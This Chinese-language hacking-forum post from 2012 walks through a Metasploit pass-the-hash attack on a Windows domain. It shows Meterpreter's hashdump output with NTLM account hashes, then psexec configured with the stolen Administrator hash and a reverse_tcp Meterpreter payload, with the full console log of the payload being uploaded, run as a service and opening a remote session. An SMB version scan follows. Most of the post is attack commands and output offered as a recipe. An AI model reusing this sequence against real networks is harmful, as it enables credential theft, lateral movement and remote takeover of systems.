切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
151 HASH攻击 METASPLOIT[复制链接]
发表于 2012-9-11 01:11:59 | 显示全部楼层 |!read_mode!
我们获得了某普通域的HASH


  1. msf > use exploit/multi/handler
  2. msf  exploit(handler) > exploit

  3. [*] Started reverse handler on 1.1.1.3:4444
  4. [*] Starting the payload handler...
  5. [*] Sending stage (752128 bytes) to 1.1.1.7
  6. [*] Meterpreter session 1 opened (1.1.1.3:4444 -> 1.1.1.7:1061) at 2012-06-27 12:54:06 -0700

  7. meterpreter > hashdump
  8. Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  9. brk:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  10. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  11. HelpAssistant:1000:198637c481956d26764ca5b909854cfc:fd119afad3d4fd346550b862a9171f09:::
  12. SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:842e5689e6a7ea73811a50b4b5b88933:::
复制代码
我们破解不出HASH能利用他来注入,必须是
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
例如:


  1. msf  exploit(handler) > use exploit/windows/smb/psexec
  2. msf  exploit(psexec) > show options

  3. Module options (exploit/windows/smb/psexec):

  4.    Name       Current Setting  Required  Description
  5.    ----       ---------------  --------  -----------
  6.    RHOST                       yes       The target address
  7.    RPORT      445              yes       Set the SMB service port
  8.    SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
  9.    SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
  10.    SMBPass                     no        The password for the specified username
  11.    SMBUser                     no        The username to authenticate as


  12. Exploit target:

  13.    Id  Name
  14.    --  ----
  15.    0   Automatic
复制代码
写入参数


  1. msf  exploit(psexec) > set RHOST 1.1.1.10
  2. RHOST => 1.1.1.10
  3. msf  exploit(psexec) > set SMBUser Administrator
  4. SMBUser => Administrator
  5. msf  exploit(psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
  6. SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
  7. msf  exploit(psexec) > set SMBDomain dis9.local
  8. SMBDomain => dis9.local
  9. msf  exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
  10. PAYLOAD => windows/meterpreter/reverse_tcp
  11. msf  exploit(psexec) > exploit

  12. [*] Started reverse handler on 1.1.1.3:4444
  13. [*] Connecting to the server...
  14. [*] Authenticating to 1.1.1.10:445|dis9 as user 'Administrator'...
  15. [*] Uploading payload...
  16. [*] Created \dSMaomfF.exe...
  17. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:1.1.1.10[\svcctl] ...
  18. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:1.1.1.10[\svcctl] ...
  19. [*] Obtaining a service manager handle...
  20. [*] Creating a new service (Dpttxxht - "MMidwbqlUXvEiQYXhfTgpLUvxW")...
  21. [*] Closing service handle...
  22. [*] Opening service...
  23. [*] Starting the service...
  24. [*] Removing the service...
  25. [*] Sending stage (752128 bytes) to 1.1.1.10
  26. [*] Closing service handle...
  27. [*] Deleting \dSMaomfF.exe...
  28. [*] Meterpreter session 2 opened (1.1.1.3:4444 -> 1.1.1.10:1201) at 2012-06-27 12:55:29 -0700
复制代码
关键参数:
SHARE ADMIN$ yes The
如果共享admin$被删除你可以扫描下其他的
域名详细内容:
auxiliary/scanner/smb/smb_version


  1. msf  auxiliary(smb_version) > set RHOSTS 1.1.1.10
  2. RHOSTS => 1.1.1.10
  3. msf  auxiliary(smb_version) > exploit

  4. [*] 1.1.1.10:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:DIS9TEAM-DOMAIN) (domain:DIS9)
  5. [*] Scanned 1 of 1 hosts (100% complete)
  6. [*] Auxiliary module execution completed
  7. msf  auxiliary(smb_version) >
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-23 14:00

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部